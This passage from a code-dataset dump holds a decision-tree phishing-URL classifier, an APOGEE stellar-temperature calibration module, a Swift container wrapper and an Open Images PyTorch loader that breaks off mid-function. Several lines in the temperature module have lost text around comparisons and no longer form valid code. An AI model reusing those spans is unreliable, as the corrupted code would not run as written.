pd.read_csv('Dataset.csv',delimiter=',',header=0)\r\nX = data.iloc[:,:-1].values\r\nY = data.iloc[:,-1].values\r\nclf = DecisionTreeClassifier()\r\nclf = clf.fit(X,Y)\r\n#input url\r\nurl = input(\"Enter the URL:\")\r\n\r\n#checking and predicting\r\ncheckprediction = Features.main(url)\r\nprediction = clf.predict(checkprediction)\r\nif (prediction == [1]):\r\n print(\"Phishing\")\r\nelse:\r\n print(\"Legitimate\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450906933","text":"# routines for comparing gravities with photometric` sample\n\nfrom apogee.utils import apload\nfrom apogee.utils import apselect\nfrom astropy.io import fits\nfrom astropy.io import ascii\nfrom tools import match\nfrom tools import plots\nfrom tools import fit\nfrom apogee.utils import bitmask\nfrom apogee.aspcap import err\nimport pdb\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib\n\ndef bindata(xdata,ydata,bins,median=True) :\n \"\"\"\n Given xdata, ydata, and bins in x, returns mean of ydata in each of the bins\n \"\"\"\n mean=bins*0.\n for i in range(len(bins)-1) :\n j=np.where((xdata>bins[i]) & (xdataglatmin and 
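# Condensed, self-contained sketch of the scrape-and-plot pipeline app.py above uses
# (a hypothetical inline table stands in for the Selenium-rendered stats table;
# pd.read_html needs lxml or html5lib installed):
from io import StringIO

import pandas as pd
import plotly.graph_objects as go
import plotly.offline as po

html = """
<table>
  <tr><th>Span</th><th>Runs</th></tr>
  <tr><td>2010</td><td>850</td></tr>
  <tr><td>2011</td><td>1100</td></tr>
</table>
"""
df = pd.read_html(StringIO(html))[0]   # read_html returns a list of DataFrames, one per <table>
fig = go.Figure(go.Scatter(x=df["Span"], y=df["Runs"], mode="lines+markers"))
po.plot(fig, filename="first_figure.html", auto_open=False)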
SFD_EBVglatmin)&(allstar['SFD_EBV']glatmin)&(allstar['SFD_EBV']>-0.01)&(allstar['SFD_EBV'] 3.8)[0]\n ghb[dw]=ghb_dwarf[dw]\n dtdjk[dw]=dtdjk_dwarf[dw]\n gd=np.where(abs(allstar['FPARAM'][:,0]-ghb) < 500)[0]\n ghb=ghb[gd]\n dtdjk=dtdjk[gd]\n allstar=allstar[gd]\n print('Teff calibration, number of stars: ', len(allstar))\n\n if calib : \n param='PARAM'\n teff=allstar[param][:,0]\n logg=allstar[param][:,1]\n mh=allstar[param][:,3]\n am=allstar[param][:,6]\n elif grid is None :\n param='FPARAM'\n teff=allstar[param][:,0]\n logg=allstar[param][:,1]\n mh=allstar[param][:,3]\n am=allstar[param][:,6]\n else :\n param='FPARAM_CLASS'\n teff=allstar[param][:,grid,0]\n logg=allstar[param][:,grid,1]\n mh=allstar[param][:,grid,3]\n am=allstar[param][:,grid,6]\n out=out+'_grid{:1d}'.format(grid)\n\n # plot Teff difference against metallicity, color-code by temperature\n fig,ax=plots.multi(1,1,hspace=0.001,wspace=0.001,figsize=(12,6))\n xr=[-3.0,1.0]\n zr=trange\n if dr13: zr=[3500,5500]\n binsize=0.25\n bins=np.arange(-2.5,0.75,binsize)\n # diff color-coded by gravity as f([M/H])\n\n if alpha :\n plots.plotc(ax,mh,teff-ghb,am,zr=[-0.1,0.4],xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt=r'[$\\alpha$/M]',rasterized=True,cmap=cmap)\n else :\n plots.plotc(ax,mh,teff-ghb,teff,xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt='$T_{eff}$',rasterized=True,zr=trange,cmap=cmap)\n mean=bindata(mh,teff-ghb,bins,median=False)\n if not dr13: plots.plotp(ax,bins+binsize/2.,mean,marker='o',size=40)\n mean=bindata(mh,teff-ghb,bins,median=True)\n if not dr13: plots.plotp(ax,bins+binsize/2.,mean,marker='o',size=40,color='b')\n ax.text(0.1,0.9,'E(B-V)<{:6.2f}'.format(ebvmax),transform=ax.transAxes)\n gd=np.where(np.isfinite(mean))[0]\n tefit = fit.fit1d(bins[gd]+binsize/2.,mean[gd],degree=2,reject=0)\n # 1D quadratic fit as a function of metallicity\n allfit = fit.fit1d(mh,teff-ghb,ydata=teff,degree=2,reject=0)\n fig2,ax2=plots.multi(1,1)\n tefit2 = fit.fit2d(mh,teff,teff-ghb,reject=0,plot=ax2,zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n #pfit = fit.fit2d(allstar[param][:,3],allstar[param][:,0],allstar[param][:,0]-ghb,plot=ax[0,0],zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n #ejk=np.clip(np.sqrt(allstar['J_ERR']**2+allstar['K_ERR']**2),0.,0.02)\n #errpar = err.errfit(teff,allstar['SNR'],mh,teff-tefit(mh)-ghb,title='Teff',out=out+'_phot',zr=[0,250],meanerr=abs(dtdjk)*ejk)\n errpar = err.errfit(teff,allstar['SNR'],mh,teff-tefit(mh)-ghb,title='Teff',out=out,zr=[0,150])\n\n x=np.linspace(-3,1,200)\n rms = (teff-tefit(mh)-ghb).std()\n if dr13: \n plots.plotl(ax,x,-36.17+95.97*x-15.09*x**2,color='k')\n print(allfit)\n else :\n plots.plotl(ax,x,tefit(x),color='k')\n ax.text(0.98,0.9,'rms: {:6.1f}'.format(rms),transform=ax.transAxes,ha='right')\n\n cmap = matplotlib.cm.get_cmap(cmap)\n for t in np.arange(trange[0],trange[1],500.) 
:\n rgba=cmap((t-trange[0])/(trange[1]-trange[0]))\n y=x*0.+t\n plots.plotl(ax,x,tefit2(x,y),color=rgba)\n\n plots._data_x = mh\n plots._data_y = teff-ghb\n plots._data = allstar\n plots.event(fig)\n\n # separate fits for low/hi alpha/M if requested\n if alpha :\n gdlo=apselect.select(allstar,badval=['STAR_BAD'],teff=trange,mh=mhrange,logg=[0,3.8],alpha=[-0.1,0.1],raw=True)\n mean=bindata(mh[gdlo],teff[gdlo]-ghb[gdlo],bins)\n plots.plotp(ax,bins,mean,marker='o',size=40,color='g')\n tmpfit = fit.fit1d(mh[gdlo],teff[gdlo]-ghb[gdlo],ydata=teff[gdlo],degree=2)\n plots.plotl(ax,x,tmpfit(x))\n print('low alpha: ', len(gdlo))\n\n gdhi=apselect.select(allstar,badval=['STAR_BAD'],teff=trange,mh=mhrange,logg=[0,3.8],alpha=[0.1,0.5],raw=True)\n mean=bindata(mh[gdhi],teff[gdhi]-ghb[gdhi],bins)\n plots.plotp(ax,bins,mean,marker='o',size=40,color='b')\n tmpfit = fit.fit1d(mh[gdhi],teff[gdhi]-ghb[gdhi],ydata=teff[gdhi],degree=2)\n plots.plotl(ax,x,tmpfit(x))\n print('hi alpha: ', len(gdhi))\n\n fig.tight_layout()\n fig.savefig(out+'.png')\n plt.close()\n plt.rc('font',size=14)\n plt.rc('axes',titlesize=14)\n plt.rc('axes',labelsize=14)\n fig.savefig(out+'.pdf')\n plt.close()\n\n # auxiliary plots with different color-codings\n try:\n meanfib=allstar['MEANFIB']\n except:\n meanfib=teff*0.\n fig,ax=plots.multi(2,2,hspace=0.001,wspace=0.001)\n plots.plotc(ax[0,0],mh,teff-ghb,logg,zr=[0,5],xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt='log g')\n plots.plotc(ax[0,1],mh,teff-ghb,meanfib,zr=[0,300],xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt='mean fiber')\n pfit = fit.fit1d(mh,teff-ghb,ydata=teff,plot=ax[1,0],zr=[-500,200],xt='[M/H]',yt='$\\Delta Teff$',xr=[-2.7,0.9],yr=[3500,5000],colorbar=True,zt='Teff')\n pfit = fit.fit1d(teff,teff-ghb,ydata=mh,plot=ax[1,1],zr=[-500,200],xt='Teff',xr=trange,yr=[-2.5,0.5],colorbar=True,zt='[M/H]')\n fig.tight_layout()\n fig.savefig(out+'_b.png')\n plt.close()\n \n # do some test 2D and 1D fits and plots \n #fig,ax=plots.multi(2,2,hspace=0.5,wspace=0.001)\n #ax[0,1].xaxis.set_visible(False)\n #ax[0,1].yaxis.set_visible(False)\n #pfit = fit.fit2d(allstar[param][:,3],allstar[param][:,0],allstar[param][:,0]-ghb,plot=ax[0,0],zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n #pfit = fit.fit1d(allstar[param][:,3],allstar[param][:,0]-ghb,ydata=allstar[param][:,0],plot=ax[1,0],zr=[-500,200],xt='[M/H]',yt='$\\Delta Teff$',xr=[-2.7,0.9],yr=[3500,5000])\n #pfit = fit.fit1d(allstar[param][:,0],allstar[param][:,0]-ghb,ydata=allstar[param][:,3],plot=ax[1,1],zr=[-500,200],xt='Teff',xr=[3900,5100],yr=[-2.5,0.5])\n plt.draw()\n return {'caltemin': 3000., 'caltemax': 10000., 'temin' : trange[0], 'temax': trange[1], \n 'mhmin': mhrange[0], 'mhmax' : mhrange[1],\n 'par': tefit.parameters, 'rms' :rms, 'par2d': tefit2.parameters, 'errpar' : errpar}\n\n\ndef irfm(allstar,trange=[4000,5000],mhrange=[-2.5,0.75],out='dteff') :\n '''\n Compares allstar ASPCPAP Teff with various photometric Teff from JAJ compilation (SAGA, CL, TH, SFD)\n Does fits \n\n Args:\n allstar : allStar structure\n\n '''\n\n # select stars\n gd=apselect.select(allstar,badval=['STAR_BAD'],teff=trange,mh=mhrange,raw=True)\n allstar=allstar[gd]\n\n # get IRFM data\n irfm=fits.open(os.environ['APOGEE_DIR']+'/data/calib/irfm_temp.fits')[1].data\n\n # get the subsamples and match. 
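# The bindata() helper defined near the top of teffcomp.py above reached us garbled; as a
# hedged reconstruction (not the author's exact code), its docstring describes the mean or
# median of ydata within each x bin, which could look like:
import numpy as np

def bindata_sketch(xdata, ydata, bins, median=True):
    out = np.zeros(len(bins))
    for i in range(len(bins) - 1):
        j = np.where((xdata > bins[i]) & (xdata < bins[i + 1]))[0]
        if len(j) > 0:
            out[i] = np.median(ydata[j]) if median else ydata[j].mean()
    return out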
Note that we have to do this separately for each subsample because some\n # stars appear in more than one subsample\n saga=np.where(irfm['SOURCE'] == 'SAGA')[0]\n saga1,saga2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][saga]))\n cl=np.where(irfm['SOURCE'] == 'CL')[0]\n cl1,cl2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][cl]))\n th=np.where(irfm['SOURCE'] == 'TH')[0]\n th1,th2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][th]))\n sfd=np.where(irfm['SOURCE'] == 'SFD')[0]\n sfd1,sfd2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][sfd]))\n\n # plot diff color-coded by gravity as f([M/H])\n fig,ax=plots.multi(2,2,hspace=0.001,wspace=0.001)\n xr=[-3.0,1.0]\n yr=[-400,300]\n zr=[3500,6000]\n bins=np.arange(-2.5,0.75,0.25)\n\n # SAGA\n plots.plotc(ax[0,0],allstar['FPARAM'][saga1,3],allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]],allstar['FPARAM'][saga1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][saga1,3],allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]],bins)\n plots.plotp(ax[0,0],bins,mean,marker='o',size=40)\n ax[0,0].text(0.1,0.9,'SAGA',transform=ax[0,0].transAxes)\n\n # CL\n plots.plotc(ax[0,1],allstar['FPARAM'][cl1,3],allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]],allstar['FPARAM'][cl1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]')\n mean=bindata(allstar['FPARAM'][cl1,3],(allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]]),bins)\n plots.plotp(ax[0,1],bins,mean,marker='o',size=40)\n ax[0,1].text(0.1,0.9,'CL',transform=ax[0,1].transAxes)\n\n # TH\n plots.plotc(ax[1,0],allstar['FPARAM'][th1,3],allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]],allstar['FPARAM'][th1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][th1,3],(allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]]),bins)\n plots.plotp(ax[1,0],bins,mean,marker='o',size=40)\n ax[1,0].text(0.1,0.9,'TH',transform=ax[1,0].transAxes)\n\n # SFD\n plots.plotc(ax[1,1],allstar['FPARAM'][sfd1,3],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],allstar['FPARAM'][sfd1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]')\n mean=bindata(allstar['FPARAM'][sfd1,3],(allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]]),bins)\n plots.plotp(ax[1,1],bins,mean,marker='o',size=40)\n ax[1,1].text(0.1,0.9,'SFD',transform=ax[1,1].transAxes)\n\n fig.savefig(out+'_mh.png')\n\n # plot diff color-coded by gravity as f([M/H])\n fig,ax=plots.multi(2,2,hspace=0.001,wspace=0.001)\n zr=[-2.0,0.5]\n yr=[-400,300]\n xr=[6000,3500]\n bins=np.arange(3500,5500,250)\n\n # SAGA\n plots.plotc(ax[0,0],allstar['FPARAM'][saga1,0],allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]],allstar['FPARAM'][saga1,3],zr=zr,xr=xr,yr=yr,xt='Teff',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][saga1,0],(allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]]),bins)\n plots.plotp(ax[0,0],bins,mean,marker='o',size=40)\n ax[0,0].text(0.1,0.9,'SAGA',transform=ax[0,0].transAxes)\n\n # CL\n plots.plotc(ax[0,1],allstar['FPARAM'][cl1,0],allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]],allstar['FPARAM'][cl1,3],zr=zr,xr=xr,yr=yr,xt='Teff')\n mean=bindata(allstar['FPARAM'][cl1,0],(allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]]),bins)\n plots.plotp(ax[0,1],bins,mean,marker='o',size=40)\n ax[0,1].text(0.1,0.9,'CL',transform=ax[0,1].transAxes)\n\n # TH\n 
plots.plotc(ax[1,0],allstar['FPARAM'][th1,0],allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]],allstar['FPARAM'][th1,3],zr=zr,xr=xr,yr=yr,xt='Teff',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][th1,0],(allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]]),bins)\n plots.plotp(ax[1,0],bins,mean,marker='o',size=40)\n ax[1,0].text(0.1,0.9,'TH',transform=ax[1,0].transAxes)\n\n # SFD\n plots.plotc(ax[1,1],allstar['FPARAM'][sfd1,0],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],allstar['FPARAM'][sfd1,3],zr=zr,xr=xr,yr=yr,xt='Teff')\n mean=bindata(allstar['FPARAM'][sfd1,0],(allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]]),bins)\n plots.plotp(ax[1,1],bins,mean,marker='o',size=40)\n ax[1,1].text(0.1,0.9,'SFD',transform=ax[1,1].transAxes)\n\n fig.savefig(out+'_teff.png')\n\n # do 2D fits with Teff and [M/H], and 1D fits with each\n\n fig,ax=plots.multi(2,2,hspace=0.5,wspace=0.001)\n ax[0,1].xaxis.set_visible(False)\n ax[0,1].yaxis.set_visible(False)\n pfit = fit.fit2d(ax[0,0],allstar['FPARAM'][sfd1,3],allstar['FPARAM'][sfd1,0],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],plot=True,zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n pfit = fit.fit1d(ax[1,0],allstar['FPARAM'][sfd1,3],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],ydata=allstar['FPARAM'][sfd1,0],plot=True,zr=[-500,200],xt='[M/H]',yt='$\\Delta Teff$',xr=[-2.7,0.9],yr=[3500,5000])\n pfit = fit.fit1d(ax[1,1],allstar['FPARAM'][sfd1,0],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],ydata=allstar['FPARAM'][sfd1,3],plot=True,zr=[-500,200],xt='Teff',xr=[3900,5100],yr=[-2.5,0.5])\n\n pdb.set_trace()\n\n return pfit\n\n\ndef dr13dr12() :\n '''\n compare dr13 dr12 Teff\n '''\n\n dr12load=apload.ApLoad(dr='dr12')\n dr12=dr12load.allStar()[1].data\n dr13load=apload.ApLoad(dr='dr13')\n dr13=dr13load.allStar()[1].data\n i1,i2 = match.match(dr12['APOGEE_ID'],dr13['APOGEE_ID'])\n dr12=dr12[i1]\n dr13=dr13[i2]\n\n fig,ax=plots.multi(1,2,hspace=0.001,wspace=0.001)\n plots.plotc(ax[0],dr13['M_H'],dr13['TEFF']-dr12['TEFF'],dr13['TEFF'],xr=[-2.5,0.75],yr=[-300,300],zr=[3500,5000])\n\n plots.plotc(ax[1],dr13['TEFF'],dr13['TEFF']-dr12['TEFF'],dr13['M_H'],xr=[6500,3000],yr=[-300,300],zr=[-2,0.5])\n\ndef cte_ghb(jk0,feh,dwarf=False) :\n \"\"\"\n Color-temperature relation from Gonzalez Hernandez & Bonifacio (2009): (J-K)_0 - Teff\n \"\"\"\n if dwarf :\n b0=0.6524 ; b1=0.5813 ; b2=0.1225 ; b3=-0.0646 ; b4=0.0370 ; b5=0.0016 # dwarfs\n else :\n b0=0.6517 ; b1=0.6312 ; b2=0.0168 ; b3=-0.0381 ; b4=0.0256 ; b5=0.0013 # giants\n theta=b0+b1*jk0+b2*jk0**2+b3*jk0*feh+b4*feh+b5*feh**2\n dtheta_djk = b1+2*b2*jk0+b3*feh\n dt_djk= -5040./theta**2*dtheta_djk\n\n return 5040./theta, dt_djk\n\n","sub_path":"python/apogee/aspcap/teffcomp.py","file_name":"teffcomp.py","file_ext":"py","file_size_in_byte":15424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"78825545","text":"# Copyright 2017 IBM Corporation\n# Copyright 2017 The Johns Hopkins University\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing 
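# Quick numerical check of cte_ghb() above: the returned dT/d(J-K) should agree with a
# finite-difference slope of the Teff relation (the input values below are illustrative only):
jk0, feh, h = 0.60, -0.5, 1e-6
teff, dt_djk = cte_ghb(jk0, feh)                    # giant relation
teff_hi, _ = cte_ghb(jk0 + h, feh)
assert abs((teff_hi - teff) / h - dt_djk) < 1e-2    # analytic and numerical derivatives agree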
permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import, print_function\nfrom swiftclient.service import SwiftError\nfrom core.objectstore.store import Store\n\nclass Container(object):\n\n def __init__(self, container_name):\n # create swift service\n self._object_store = Store.load()\n self._name = container_name\n\n @property\n def name(self):\n return self._name\n\n def create(self):\n \"\"\"Create a container\"\"\"\n \n try:\n self._object_store._service.post(self.name)\n except SwiftError as e:\n print(e)\n raise e\n \n def update(container_name):\n \"\"\"Update a container metadata\"\"\"\n return NotImplemented \n\n def delete(self):\n \"\"\"Delete a container\"\"\"\n\n try:\n response = self._object_store._service.delete(container=self.name)\n for page in response:\n continue\n except SwiftError as e:\n print(e)\n raise e\n\n @staticmethod\n def list():\n \"\"\"List containers\"\"\"\n \n object_store = Store.load()\n try:\n response = object_store._service.list()\n except SwiftError as e:\n print(e)\n raise e\n for page in response:\n for container in page['listing']:\n yield Container(container['name'])\n","sub_path":"objectfs/core/data/.old/swift/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560918279","text":"#-*-coding:utf-8-*-\n\nimport torch.utils.data as tdata\nimport os\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom config import cfg\nimport json\n\n\ndef read_descriptions():\n data = pd.read_csv(os.path.join(cfg.FILE.BASE_PATH,\n cfg.FILE.CLASS_DESCRIPTION))\n class2Name = {}\n class2Name[\"/m/061hd_\"] = \"Infant bed\"\n for _, row in data.iterrows():\n class2Name[row[\"/m/061hd_\"]] = row[\"Infant bed\"]\n return class2Name\n\n\ndef load_class(classes):\n class2idx = dict(((cls, idx) for idx, cls in enumerate(classes)))\n return class2idx\n\n\ndef analyse_hierarchy_old(json_dir):\n json_file = open(os.path.join(cfg.FILE.BASE_PATH, json_dir))\n json_dict = json.load(json_file)\n labelName = cfg.BBOX.CSV_LABELNAME\n subcategory = \"Subcategory\"\n classes = [json_dict[labelName]]\n\n def _handle_list(json_list):\n for json_dict in json_list:\n classes.append(json_dict[labelName])\n\n for js_dict in json_list:\n sub = js_dict.get(subcategory, None)\n if sub:\n _handle_list(sub)\n\n _handle_list(json_dict[subcategory])\n return classes\n\n\ndef old_idx_class_map():\n classes = analyse_hierarchy_old(cfg.FILE.CLASS_HIERARCHY_FILE)\n class2idx = load_class(classes)\n return class2idx\n\n\ndef old2new(new):\n o2n = {}\n old = old_idx_class_map()\n for cls in new:\n o2n[old[cls]] = new[cls]\n return o2n\n\n\ndef analyse_hierarchy(json_dir, class2idx):\n json_file = open(os.path.join(cfg.FILE.BASE_PATH, json_dir))\n json_dict = json.load(json_file)\n lableName = cfg.BBOX.CSV_LABELNAME\n subcategory = \"Subcategory\"\n hierarchy = {}\n\n stack = []\n\n def _analyse_hierarchy(json_dict):\n cls = json_dict[lableName]\n if subcategory in json_dict:\n if cls in class2idx:\n stack.append(cls)\n for json_obj in json_dict[subcategory]:\n _analyse_hierarchy(json_obj)\n\n if cls in class2idx:\n stack.pop(-1)\n\n if cls in class2idx:\n temp = []\n temp.extend(stack)\n if cls in hierarchy:\n hierarchy[cls].extend(temp)\n else:\n hierarchy[cls] = temp\n _analyse_hierarchy(json_dict)\n return hierarchy\n\n\ndef get_multi_labels_hierarchy_and_classes():\n class2idx, class2Name = handle_class()\n hi 
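# Hypothetical usage of the Container wrapper above (assumes Store.load() resolves a
# configured Swift connection; the bucket name is made up):
bucket = Container("scratch-bucket")
bucket.create()
for c in Container.list():        # Container.list() yields Container objects
    print(c.name)
bucket.delete()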
= analyse_hierarchy(cfg.FILE.CLASS_HIERARCHY_FILE, class2idx)\n    class2idx = dict(((key, idx) for idx, key in enumerate(hi.keys())))\n    idx2class = dict(((idx, key) for idx, key in enumerate(hi.keys())))\n    hidx = {}\n    for key in hi:\n        hidx[class2idx[key]] = [class2idx[x] for x in hi[key]]\n    return class2idx, idx2class, class2Name, hidx\n\n\ndef handle_class():\n    class2Name = read_descriptions()\n    classes = class2Name.keys()\n    class2idx = load_class(classes)\n    return class2idx, class2Name\n\n\ndef multi_label_handler(annotations, hierarchy):\n    size = annotations.shape[0]\n    labels = []\n    for i in range(size):\n        temp = int(annotations[i, 0])\n        label = [temp]\n        label.extend(hierarchy[temp])\n        label = np.array(label, dtype=int)\n        labels.append(label)\n    return labels\n\n\nclass TestLoader(tdata.Dataset):\n\n    @staticmethod\n    def load_image_item(file):\n        return Image.open(file).convert(\"RGB\")\n\n    def __init__(self, root, transform=None):\n        super(TestLoader, self).__init__()\n\n        self.root = root\n        self.images_dir = os.path.join(root, \"test\")\n        self.transform = transform\n\n        if not os.path.exists(self.images_dir):\n            raise OSError(\"...\")\n\n        count = 0\n        with os.scandir(self.images_dir) as scanner:\n            for _ in scanner:\n                count += 1\n        numbers = count\n\n        self.numbers = numbers\n\n    def __len__(self):\n        return self.numbers\n\n    def search_file(self, item):\n        select_file = None\n        with os.scandir(self.images_dir) as scanner:\n            for idx, entry in enumerate(scanner):\n                if idx == item:\n                    select_file = entry.name\n        if not select_file:\n            raise RuntimeError(\"search image failed!\")\n        return select_file.replace(\".jpg\", \"\")\n\n    def load_data(self, idx):\n        file_info = self.search_file(idx)\n        image_file = os.path.join(self.images_dir, \"{}.jpg\".format(file_info))\n        image = self.load_image_item(image_file)\n        return file_info, image\n\n    def __getitem__(self, item):\n        file_info, image = self.load_data(item)\n        info = None\n\n        if self.transform is not None:\n            image, info = self.transform(image, None)\n\n        return file_info, image, info\n\n\nclass ImageLoader(tdata.Dataset):\n\n    def get_length(self):\n        raise NotImplementedError\n\n    def __init__(self,\n                 root,\n                 dataset=\"train\",\n                 transforms=None,\n                 help_file=None):\n        super(ImageLoader, self).__init__()\n\n        self.root = root\n        self.dataset = dataset\n        self.transforms = transforms\n\n        self.images_dir = os.path.join(root, dataset)\n        self.ann_dir = os.path.join(root, \"labels/{}\".format(dataset))\n        if not os.path.exists(self.root) or not os.path.exists(self.ann_dir):\n            raise OSError(\"the folder {} or {} does not exist!\".format(self.images_dir,\n                                                                       self.ann_dir))\n        self.help_file = help_file\n\n        if not self.help_file:\n            count = 0\n            with os.scandir(self.ann_dir) as scanner:\n                for _ in scanner:\n                    count += 1\n            numbers = count\n        else:\n            numbers = self.get_length()\n        self.numbers = numbers\n\n        self.class2idx, self.idx2class, self.class2name, self.label_hierarchy = self.load_classes()\n\n    def judge_similar(self, a, b):\n        \"\"\"\n        Returns in the order: parent, child (or (-1, -1) if the two labels are unrelated).\n        :param a:\n        :param b:\n        :return:\n        \"\"\"\n        a_h = self.label_hierarchy[a]\n        b_h = self.label_hierarchy[b]\n        if b in a_h:\n            return b, a\n        if a in b_h:\n            return a, b\n        return -1, -1\n\n    def __len__(self):\n        return self.numbers\n\n    def __getitem__(self, item):\n        image, annotation = self.load_data(item)\n\n        if self.transforms is not None:\n            image, annotation = self.transforms(image, annotation)\n\n        return image, annotation\n
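    # Toy illustration of multi_label_handler() defined above (the ids are made up):
    #     toy_hierarchy = {0: [], 1: [0], 2: [1, 0]}        # class 2 descends from 1, which descends from 0
    #     toy_anns = np.array([[2.0, 0.1, 0.2, 0.3, 0.4]])  # [class, x1, y1, x2, y2]
    #     multi_label_handler(toy_anns, toy_hierarchy)      # -> [array([2, 1, 0])]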
    def search_file(self, item):\n        select_file = None\n        with os.scandir(self.ann_dir) as scanner:\n            for idx, entry in enumerate(scanner):\n                if idx == item:\n                    select_file = entry.name\n        if not select_file:\n            raise RuntimeError(\"search image failed!\")\n        return select_file.replace(\".txt\", \"\")\n\n    def handle_multi_label(self, anns):\n        return multi_label_handler(anns, self.label_hierarchy)\n\n    @staticmethod\n    def load_image_item(file):\n        return Image.open(file).convert(\"RGB\")\n\n    @staticmethod\n    def load_annotations_item(file):\n        return np.loadtxt(file, ndmin=2, dtype=np.float32)\n\n    def load_classes(self):\n        cls2idx, idx2cls, cls2Name, hi = get_multi_labels_hierarchy_and_classes()\n        return cls2idx, idx2cls, cls2Name, hi\n\n    @staticmethod\n    def handle_annotations(image, annotations):\n        width, height = image.size\n        annotations[:, 1:3] *= width\n        annotations[:, 3:] *= height\n\n        # [x, x1, x2, y1, y2] -> [x, x1, y1, x2, y2]\n        bbox = np.zeros((annotations.shape[0], 5), dtype=np.float32)\n        bbox[:, 1] += annotations[:, 1]\n        bbox[:, 4] += annotations[:, 4]\n        bbox[:, 2] += annotations[:, 3]\n        bbox[:, 3] += annotations[:, 2]\n        # bbox[:, 1::3] += annotations[:, 1::3]\n        # bbox[:, 2:4] += annotations[:, 3:1:-1]\n        bbox[:, 0] += annotations[:, 0]\n        return bbox\n\n    def load_data(self, idx):\n        file_info = self.search_file(idx)\n        image_file = os.path.join(self.images_dir, \"{}.jpg\".format(file_info))\n        ann_file = os.path.join(self.ann_dir, \"{}.txt\".format(file_info))\n        image = self.load_image_item(image_file)\n        annotations = self.load_annotations_item(ann_file)[:, 0:5]\n        annotations = self.handle_annotations(image, annotations)\n        return image, annotations\n\n    def get_label(self, idx):\n        return self.class2name[self.idx2class[idx]]\n\n\nclass TrainLoader(ImageLoader):\n    \"\"\"\n    When processing the OID dataset, its sheer size forced the training set to be split\n    into several sub-datasets. To cope with the annotation loading this causes, and with\n    the mistakes made while handling the class hierarchy, this class has to be used to\n    load the training data. The validation and test sets do not have these problems, so\n    keep using the parent class ImageLoader for them. In the future, if there is time,\n    please regenerate the training set annotation files.\n    \"\"\"\n    def __init__(self,\n                 root,\n                 transforms=None,\n                 help_file=None):\n        self._idx_dict = {}\n        super(TrainLoader, self).__init__(root, \"train\", transforms, help_file)\n\n    def __len__(self):\n        return self.numbers\n\n    def get_length(self):\n        file = open(self.help_file)\n        lines = file.readlines()\n\n        acc = 0\n        for line in lines:\n            idx, length = line.split(\" \")\n            length = length.replace(\"\\\\n\", \"\")\n            length = int(length)\n            self._idx_dict[acc] = idx\n            acc += length\n        file.close()\n        return acc\n\n    def search_file(self, item):\n        idxs = list(self._idx_dict.keys())\n        # print(self._idx_dict)\n        idxs.sort(reverse=True)\n        select_key = None\n        relative_idx = 0\n        i = None\n        for i in idxs:\n            if item >= i:\n                select_key = self._idx_dict[i]\n                relative_idx = item - i\n                break\n        images_dir = \"train_{}\".format(select_key)\n        select_file = None\n        with 